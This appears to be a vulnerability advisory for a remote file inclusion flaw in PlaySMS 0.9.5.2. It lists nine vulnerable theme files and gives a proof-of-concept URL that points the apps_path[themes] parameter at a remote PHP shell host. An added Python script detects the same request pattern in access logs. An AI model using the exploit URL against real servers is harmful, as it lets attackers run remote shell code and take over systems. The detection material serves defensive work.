PlaySMS Remote File Inclusion Vulnerability
[o] PlaySMS <= Remote File Inclusion Vulnerability
Software : PlaySMS ver 0.9.5.2
Vendor : http://playsms.org/
Author : NoGe
[o] Vulnerability
All of the following files are affected:
web/plugin/themes/default/page_forgot.php
web/plugin/themes/default/page_login.php
web/plugin/themes/default/page_noaccess.php
web/plugin/themes/default/page_register.php
web/plugin/themes/km2/page_noaccess.php
web/plugin/themes/work2/page_forgot.php
web/plugin/themes/work2/page_login.php
web/plugin/themes/work2/page_noaccess.php
web/plugin/themes/work2/page_register.php
[o] Exploit
http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]
[o] PoC
http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?
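[o] Detection (added example, not part of the original advisory or of PlaySMS)
The request pattern above can be searched for in web server access logs. This sketch assumes combined-format logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Theme files listed in the advisory.
AFFECTED = tuple("/web/plugin/themes/" + p for p in (
    "default/page_forgot.php", "default/page_login.php",
    "default/page_noaccess.php", "default/page_register.php",
    "km2/page_noaccess.php", "work2/page_forgot.php",
    "work2/page_login.php", "work2/page_noaccess.php",
    "work2/page_register.php"))
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A value that starts with scheme: (http:, ftp:, php:, data:) or //host.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//)", re.I)

def classify(line):
    """Return None, 'param-set' or 'remote-url' for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    if not any(f in unquote(path) for f in AFFECTED):
        return None
    verdict = None
    # parse_qsl percent-decodes, so apps_path%5Bthemes%5D is caught too.
    for key, value in parse_qsl(query, keep_blank_values=True):
        # PHP turns dots and spaces in parameter names into underscores.
        name = key.split("[", 1)[0].replace(".", "_").replace(" ", "_")
        if name != "apps_path":
            continue
        if REMOTE_RE.match(value):
            return "remote-url"
        verdict = "param-set"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    checked = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in checked if v]

# Constructed sample lines (combined log format), not real traffic.
_P = '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /playsms'
SAMPLE = [
    _P + '/web/plugin/themes/default/page_login.php HTTP/1.1" 200 512',
    _P + '/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://example.invalid/x? HTTP/1.1" 200 90',
    _P + '/web/plugin/themes/work2/page_register.php?apps_path%5Bthemes%5D=http%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 90',
    _P + '/web/plugin/themes/km2/page_noaccess.php?apps_path[themes]=default HTTP/1.1" 200 90',
    _P + '/index.php?apps_path[themes]=http://example.invalid/x HTTP/1.1" 200 1',
]
if __name__ == "__main__":
    print(scan(SAMPLE))
```

A 'param-set' hit means a client supplied apps_path to one of the listed theme files without a URL-like value; it is still worth reviewing, because that variable is not expected to come from the request.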